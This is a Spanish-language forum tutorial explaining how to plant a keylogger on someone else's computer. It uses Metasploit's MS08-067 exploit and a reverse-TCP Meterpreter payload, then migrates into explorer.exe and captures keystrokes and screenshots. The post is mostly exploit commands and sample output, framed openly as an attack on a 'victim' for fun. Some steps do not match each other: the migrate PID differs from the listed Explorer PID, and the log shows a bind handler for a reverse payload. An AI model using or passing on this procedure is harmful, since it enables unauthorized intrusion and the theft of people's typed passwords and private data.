Plantar Keylogger con BackTrack

Publicado por D3M0N, 01 de Marzo de 2011, 08:05:16 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

D3M0N

Plantar Keylogger con BackTrack

Buenas, empece hace un rato con el backtrack... no me llevo muy bien pero bueno, les paso una forma de colocar en otro ordenador un keylogger con solo saber la MAC y la IP de este.

y como sacamos la ip? bueno facil, no me acuerdo... jeje... ;D tienes la contraseíña (o no) entras y navegas en internet un rato, vas a tener una ip y una ip puerta de enlace, un numero anterior a esta suele ser la ip por moderaciín del router o sea la ip del ordenador madre de la red.


1er Paso:

Abrimos el Metasploit, desde el menu inicio.


Este es el entorno visual del program. ahora, vamos a llamar al exploit que utilizaremos:

use exploit/windows/smb/ms08_067_netapi


luego especificamos la IP del ordenador a atacar:

set RHOST 190.138.0.2


seleccionamos el payload:

set PAYLOAD windows/meterpreter/reverse_tcp


ahora ejecutamos el exploit:

exploit


Al poco tiempo veremos si nos hemos conectado satisfactoriamente a la victima:

Cita de: Esto nos dira si esta bien conectado
  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 2 - lang:Spanish
  • Selected Target: Windows XP SP2 Spanish (NX)
  • Triggering the vulnerability...
  • Sending stage (723456 bytes)
  • Meterpreter session 1 opened (192.168.0.2:4367 -> 192.168.0.3:4444)

    meterpreter >
Ahora podemos iniciar el keylogger; pero antes miraremos los procesos que se estan ejecutando en el ordenador victima; ejecutamos:

ps


y nos saldra esto por ejemplo:

CitarProcess list
============

PID Name Path
--- ---- ----
368 smss.exe SystemRootSystem32smss.exe
548 csrss.exe ??C:WINDOWSsystem32csrss.exe
576 winlogon.exe ??C:WINDOWSsystem32winlogon.exe
656 services.exe C:WINDOWSsystem32services.exe
668 lsass.exe C:WINDOWSsystem32lsass.exe
824 svchost.exe C:WINDOWSsystem32svchost.exe
840 cmd.exe C:WINDOWSsystem32cmd.exe
892 svchost.exe C:WINDOWSsystem32svchost.exe
988 svchost.exe C:WINDOWSSystem32svchost.exe
1040 svchost.exe C:WINDOWSsystem32svchost.exe
1128 svchost.exe C:WINDOWSsystem32svchost.exe
1384 wuauclt.exe C:WINDOWSsystem32wuauclt.exe
1512 spoolsv.exe C:WINDOWSsystem32spoolsv.exe
1632 Explorer.EXE C:WINDOWSExplorer.EXE
1684 alg.exe C:WINDOWSSystem32alg.exe
1700 wscntfy.exe C:WINDOWSsystem32wscntfy.exe
1800 ctfmon.exe C:WINDOWSsystem32ctfmon.exe
1908 inetinfo.exe C:WINDOWSsystem32inetsrvinetinfo.exe
1936 metsvc.exe C:WINDOWSTEMPLsMhsBTbmetsvc.exe

meterpreter >

Observamos que el proceso Explorer.exe tiene un PID (Process ID) de 1632, entonces mudaremos nuestra herramienta a ese proceso:

migrate 316


Activamos el keylogger:

keyscan_start


y queremos ver lo que esta escribiendo la victima:

keyscan_dump


CitarDumping  capture Keystrokes:
Aqui esta apareciendo el texto, jajaja soy una victima... y no se nada... que mal... el antivirus no funka...

si queremos una captura de pantalla; primero se carga el plugin:

use espia


luego usamos:

screenshot [Ruta_Archivo_Salida]


ejemplo: screenshot /imagen.bmp


parece que nuestra victima sabe montar un s.o.  :o :o :o :o :o :o jajaja bueno, aqui termina el tutorial; gracias jorgepastor66. Ahora unos videos:


http://www.youtube.com/v/btfcfS_0BOk


http://www.youtube.com/v/ANJiPanbYFo


http://www.youtube.com/v/uKchtcwZOnc


http://www.youtube.com/v/1Y37FMR03pY


Diccionario:

Keylogger: Un keylogger (derivado del bronx: key (tecla) y logger (registrador); registrador de teclas) es un tipo de software que se encarga de registrar las pulsaciones que se realizan en el teclado, para memorizarlas en un fichero y/o enviarlas a travís de internet.

Payload: se define como la acciín que ejecuta el virus segín lo especificado por el programador.

Meterpreter: es un payload avanzado que se incluye en el Metasploit Framework. Su objetivo es proporcionar a los complejos y las caracterí­sticas avanzadas que de otro modo serí­a tedioso para aplicar estrictamente en el montaje. La forma en que se lleva a cabo esto es permitiendo a los desarrolladores escribir sus propias extensiones en forma de objeto compartido (DLL) que pueden cargar y se inyecta en un proceso que se ejecuta en un equipo de destino despuís de la explotaciín se ha producido.